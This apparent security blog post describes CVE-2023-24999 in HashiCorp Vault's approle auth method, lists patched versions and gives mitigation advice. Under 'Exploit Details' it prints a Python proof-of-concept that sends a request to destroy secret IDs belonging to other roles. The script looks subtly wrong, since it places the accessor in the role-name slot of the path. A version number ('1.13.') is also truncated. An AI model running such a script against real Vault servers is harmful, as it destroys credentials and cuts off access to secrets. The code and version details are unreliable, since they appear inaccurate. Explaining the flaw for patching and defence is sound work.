CVE-2023-24999 - HashiCorp Vault and Vault Enterprise's Critical Vulnerability and the Importance of Ensuring Secret ID Confidentiality within Your Organization

Recently, a critical vulnerability (CVE-2023-24999) has been identified in HashiCorp Vault and Vault Enterprise's approle auth method. This vulnerability enabled any authenticated user with access to an approle to destroy the secret ID of any other role, merely by providing the secret ID accessor. With the potential to compromise critical and sensitive data, this vulnerability must be taken seriously and addressed accordingly. As a result, HashiCorp has released patches in Vault versions 1.13., 1.12.4, 1.11.8, 1.10.11, and later.

Original References

The issue was first reported by HashiCorp and assigned a CVE-ID as CVE-2023-24999. For more in-depth information on the vulnerability, you can visit the following HashiCorp support links:
- HashiCorp Security Advisory
- CVE Details Page on HashiCorp

Exploit Details

What made this vulnerability particularly concerning is that any authenticated user, even with limited privileges, could destroy secret IDs related to other roles by providing the secret ID accessor. These secret IDs are vital for secure access to sensitive data stored in Vault and are used for authentication reasons. When destroyed, critical information could potentially become inaccessible or compromised.

Imagine this sample code snippet used to destroy secret IDs

import requests
from sys import argv

def destroy_secret_id(vault_server, approle_id_accessor):
    response = requests.post(f"{vault_server}/v1/auth/approle/role/{approle_id_accessor}/secret-id/destroy",
                             headers={"X-Vault-Token": "your_vault_token"})

    if response.status_code == 200:
        print("Secret ID destroyed successfully.")
    else:
        print("Error destroying secret ID. Check your connections and tokens.")

if __name__ == "__main__":
    vault_server = argv[1]
    approle_id_accessor = argv[2]
    destroy_secret_id(vault_server, approle_id_accessor)

This simple script demonstrates how a secret ID's accessor could be provided, and then used to destroy the secret ID. Because the malicious user only needs the secret ID accessor, even a user without complete access to the targeted approle would still be able to exploit the vulnerability.

Mitigation and Patching

To address this critical vulnerability, HashiCorp has released patches in Vault versions 1.13., 1.12.4, 1.11.8, and 1.10.11. It is highly recommended to update your Vault instances to one of these versions or higher to ensure complete protection from this issue.

For those using HashiCorp Vault and who are unable to update immediately, it is crucial to restrict and monitor access to secret IDs and their corresponding approle endpoints. This can be achieved by carefully managing user privileges, and only granting the necessary level of access to secret IDs and approle resources.

Conclusion

The CVE-2023-24999 vulnerability exposed a critical flaw in HashiCorp Vault and Vault Enterprise's approle auth method. By allowing authenticated users to destroy the secret ID of other roles, the security of the system was put at significant risk. Thanks to the updates released by HashiCorp, this issue has now been addressed. As a best practice, ensure your Vault instances are up to date and that access to secret IDs and approles is closely monitored.

Timeline

Published on: 03/11/2023 00:15:00 UTC
Last modified on: 05/05/2023 20:15:00 UTC